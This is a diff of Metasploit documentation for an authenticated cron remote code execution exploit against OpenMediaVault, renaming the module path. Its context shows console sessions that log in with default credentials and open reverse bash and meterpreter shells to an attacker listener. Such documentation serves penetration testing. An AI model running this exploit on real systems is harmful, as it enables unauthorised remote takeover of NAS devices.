|
44 | 44 |
|
45 | 45 | ## Verification Steps |
46 | 46 | - [ ] Start `msfconsole` |
47 | | -- [ ] `use exploit/multi/http/openmediavault_auth_cron_rce` |
| 47 | +- [ ] `use exploit/unix/webapp/openmediavault_auth_cron_rce` |
48 | 48 | - [ ] `set rhosts <ip-target>` |
49 | 49 | - [ ] `set rport <port>` |
50 | 50 | - [ ] `set lhost <attacker-ip>` |
|
66 | 66 |
|
67 | 67 | ## Scenarios |
68 | 68 | ```msf |
69 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > info |
| 69 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > info |
70 | 70 |
|
71 | 71 | Name: OpenMediaVault rpc.php Authenticated Cron Remote Code Execution |
72 | | - Module: exploit/multi/http/openmediavault_auth_cron_rce |
| 72 | + Module: exploit/unix/webapp/openmediavault_auth_cron_rce |
73 | 73 | Platform: Unix, Linux |
74 | 74 | Arch: cmd, x86, x64, armle, aarch64 |
75 | 75 | Privileged: Yes |
|
143 | 143 | ``` |
144 | 144 | ### openmediavault_7.0-32-amd64.iso appliance Unix command - cmd/unix/reverse_bash |
145 | 145 | ```msf |
146 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set rhosts 192.168.201.6 |
| 146 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set rhosts 192.168.201.6 |
147 | 147 | rhosts => 192.168.201.6 |
148 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set lhost 192.168.201.8 |
| 148 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set lhost 192.168.201.8 |
149 | 149 | lhost => 192.168.201.8 |
150 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > check |
| 150 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > check |
151 | 151 |
|
152 | 152 | [*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault |
153 | 153 | [*] Trying to detect if target is running a vulnerable version of OpenMediaVault. |
154 | 154 | [+] 192.168.201.6:80 - The target is vulnerable. Version 7.0.pre.32 |
155 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit |
| 155 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit |
156 | 156 |
|
157 | 157 | [*] Started reverse TCP handler on 192.168.201.8:4444 |
158 | 158 | [*] Running automatic check ("set AutoCheck false" to disable) |
|
172 | 172 | ``` |
173 | 173 | ### openmediavault_7.0-32-amd64.iso appliance Linux Dropper - linux/x64/meterpreter/reverse_tcp |
174 | 174 | ```msf |
175 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set target 1 |
| 175 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set target 1 |
176 | 176 | target => 1 |
177 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit |
| 177 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit |
178 | 178 |
|
179 | 179 | [*] Started reverse TCP handler on 192.168.201.8:4444 |
180 | 180 | [*] Running automatic check ("set AutoCheck false" to disable) |
|
204 | 204 | ``` |
205 | 205 | ### openmediavault 7.3.0-5 ARM64 Raspberry PI-4 Unix command - cmd/unix/reverse_bash |
206 | 206 | ```msf |
207 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set target 0 |
| 207 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set target 0 |
208 | 208 | target => 0 |
209 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10 |
| 209 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10 |
210 | 210 | rhosts => 192.168.1.10 |
211 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set lhost 192.168.1.8 |
| 211 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set lhost 192.168.1.8 |
212 | 212 | lhost => 192.168.1.8 |
213 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit |
| 213 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit |
214 | 214 |
|
215 | 215 | [*] Started reverse TCP handler on 192.168.201.8:4444 |
216 | 216 | [*] Running automatic check ("set AutoCheck false" to disable) |
|
229 | 229 | ``` |
230 | 230 | ### openmediavault 7.3.0-5 ARM64 Raspberry PI-4 Linux Dropper - linux/aarch64/meterpreter_reverse_tcp |
231 | 231 | ```msf |
232 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set target 1 |
| 232 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set target 1 |
233 | 233 | target => 1 |
234 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10 |
| 234 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10 |
235 | 235 | rhosts => 192.168.1.10 |
236 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set lhost 192.168.1.8 |
| 236 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set lhost 192.168.1.8 |
237 | 237 | lhost => 192.168.1.8 |
238 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit |
| 238 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit |
239 | 239 |
|
240 | | -msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit |
| 240 | +msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit |
241 | 241 |
|
242 | 242 | [*] Started reverse TCP handler on 192.168.201.8:4444 |
243 | 243 | [*] Running automatic check ("set AutoCheck false" to disable) |
|
0 commit comments